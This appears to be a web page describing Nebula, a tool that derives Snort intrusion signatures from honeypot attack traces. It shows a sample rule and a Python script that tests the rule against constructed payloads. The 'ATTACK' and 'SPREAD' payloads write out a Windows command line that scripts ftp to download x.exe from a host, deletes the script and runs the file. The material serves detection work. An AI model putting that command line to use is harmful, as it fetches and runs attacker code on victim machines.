Nebula is a network intrusion signature generator. It can help secure a network by automatically deriving filter rules from attack traces and installing them. In a common setup, nebula runs as a daemon and receives attack traces from honeypots. Signatures are currently published in Snort format.

The code was written to be fast: a signature is of little value if generating it takes hours or days. With nebula, you should get a first revision within a few seconds.
The example signature below was generated by nebula for the FTP download stage of a multi-stage attack: a command line that scripts an ftp client to fetch a file and then deletes the script.
alert tcp any any -> $HOME_NET 8555 (msg: "nebula rule 2000001 rev. 1"; content: "cmd /"; offset: 0; depth: 5; content: " echo open "; distance: 1; within: 17; content: ">> ii &echo user 1 1 >> ii &echo get "; distance: 13; within: 70; content: ">> ii &echo bye >> ii &ftp -n -v -s:ii &del ii &"; distance: 2; within: 107; sid: 2000001; rev: 1;)
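As an added example (not code from the original post or from the nebula project), the Python below applies the content matchers of the rule above the way Snort evaluates offset/depth/distance/within, against three constructed payloads: a command line of the kind the rule was derived from, a benign one that shares only the "cmd /" prefix, and one with a long host name after "open" that pushes the third content out of its window. The rule text is taken from this page; the payloads are constructed, not captured traffic, and the matcher handles only the options this rule uses (no hex escapes, nocase or other modifiers).

```python
"""Apply the Snort content matchers of the nebula rule above to sample payloads.

Added example, not part of nebula or of the original post.  Only the
content/offset/depth/distance/within options are interpreted; Snort hex
escapes (|41 42|), nocase and other modifiers are not handled (the rule on
the page uses none of them).
"""
import re

# The signature as printed on the page, joined onto a single line.
NEBULA_RULE = (
    'alert tcp any any -> $HOME_NET 8555 (msg: "nebula rule 2000001 rev. 1"; '
    'content: "cmd /"; offset: 0; depth: 5; '
    'content: " echo open "; distance: 1; within: 17; '
    'content: ">> ii &echo user 1 1 >> ii &echo get "; distance: 13; within: 70; '
    'content: ">> ii &echo bye >> ii &ftp -n -v -s:ii &del ii &"; distance: 2; within: 107; '
    'sid: 2000001; rev: 1;)'
)


def parse_contents(rule):
    """Return the rule's content matchers, in order, as a list of dicts."""
    body = rule[rule.index("(") + 1:rule.rindex(")")]
    matchers = []
    # Split the option list on ';' but never inside a double-quoted value.
    for opt in re.findall(r'(?:[^;"]|"[^"]*")+', body):
        key, _, val = opt.strip().partition(":")
        key, val = key.strip(), val.strip()
        if key == "content":
            matchers.append({"content": val.strip('"').encode(), "offset": 0,
                             "depth": None, "distance": None, "within": None})
        elif key in ("offset", "depth", "distance", "within") and matchers:
            matchers[-1][key] = int(val)
    return matchers


def match_contents(payload, matchers):
    """Apply the matchers Snort-style; return the (start, end) span of each
    match, or None as soon as one content fails.

    Absolute matcher: the search starts at `offset`; with `depth`, only the
    next `depth` bytes are searched and the pattern must fit inside them.
    Relative matcher (distance/within present): the search starts `distance`
    bytes past the end of the previous match; with `within`, the pattern must
    lie entirely inside the next `within` bytes from that point.
    """
    spans = []
    cursor = 0  # end of the previous match
    for m in matchers:
        if m["distance"] is not None or m["within"] is not None:
            start = cursor + (m["distance"] or 0)
            end = start + m["within"] if m["within"] is not None else len(payload)
        else:
            start = m["offset"]
            end = start + m["depth"] if m["depth"] is not None else len(payload)
        idx = payload[start:end].find(m["content"])
        if idx < 0:
            return None
        cursor = start + idx + len(m["content"])
        spans.append((start + idx, cursor))
    return spans


def rule_matches(payload, rule=NEBULA_RULE):
    """True if every content of `rule` matches `payload` in sequence."""
    return match_contents(payload, parse_contents(rule)) is not None


# Constructed sample payloads (not captured traffic).  ATTACK is the kind of
# command line the rule was derived from: a scripted ftp session that fetches
# a second-stage file.  BENIGN shares only the "cmd /" prefix.  SPREAD contains
# every string of the rule, but a 50-byte host name after "open" pushes the
# third content past its distance+within window, so the rule does not fire.
ATTACK = (b"cmd /c echo open 10.0.0.1 1234 >> ii &echo user 1 1 >> ii &echo get x.exe "
          b">> ii &echo bye >> ii &ftp -n -v -s:ii &del ii &x.exe\r\n")
BENIGN = b"cmd /c dir\r\n"
SPREAD = (b"cmd /c echo open " + b"a" * 50 + b" 1234 >> ii &echo user 1 1 >> ii &echo get x.exe "
          b">> ii &echo bye >> ii &ftp -n -v -s:ii &del ii &x.exe\r\n")

if __name__ == "__main__":
    for name, payload in (("ATTACK", ATTACK), ("BENIGN", BENIGN), ("SPREAD", SPREAD)):
        print(name, match_contents(payload, parse_contents(NEBULA_RULE)))
```

The SPREAD payload shows the caveat that comes with automatically derived windows: the distance/within values encode the gap sizes seen in the traces, so a host name or file name longer than anything observed slips past the rule, and loosening the later `within` values buys that coverage at the price of more false positives.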
Nebula has successfully generated signatures from honeytrap and argos input. Feeding it input from other sources is not difficult, though: the code archive contains a command line client which submits data from files to a nebula server. It uses the nebula library and can serve as a reference implementation for extensions to other sensors.
It is a very informative tool! We have installed it in our honeypot system, so it takes data, immediately generates signatures, verifies these signatures for false positives and then publishes them. We have successfully created Nessus plugins if there are any 0day attacks in our network. With the help of nebula, well, there are lots of attacks, but we need to use our intelligence to find the right one.
Source code for Nebula is also available!
Operating Systems supported:
Unix Systems
Download Nebula here